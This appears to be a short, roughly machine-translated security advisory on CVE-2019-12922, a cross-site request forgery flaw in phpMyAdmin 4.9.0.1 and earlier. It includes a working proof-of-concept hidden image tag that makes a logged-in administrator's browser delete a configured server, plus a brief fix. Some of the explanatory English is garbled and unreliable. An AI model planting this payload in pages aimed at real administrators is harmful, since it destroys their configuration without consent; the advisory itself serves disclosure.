phpMyAdmin is a free software tool written in PHP, a process for managing MySQL or MariaDB database server. You can use phpMyAdmin perform most management tasks, including creating a database, run queries and add user accounts.
Has been detected in phpMyAdmin to cross-site request forgery, allow attackers to trigger a CSRF attack against delete any user settings page phpMyAdmin server. An attacker can easily create fake hyperlinks you want to request containing the user's behalf, so that you can avoid the errors caused by using the HTTP method CSRF attacks.
CVE-2019-12922: phpMyAdmin 4.9.0.1 - CSRF
Affected versions
- phpMyAdmin <= 4.9.0.1
shortly
Exploit CSRF – Deleting main server
<p>Deleting Server 1</p>
<img src=”
http://server/phpmyadmin/setup/index.php?page=servers&mode=remove&id=1″
style=”display:none;” />
Solution
Implement authentication token variables in each call, as in other phpMyAdmin request has been completed that.
Via: packetstormsecurity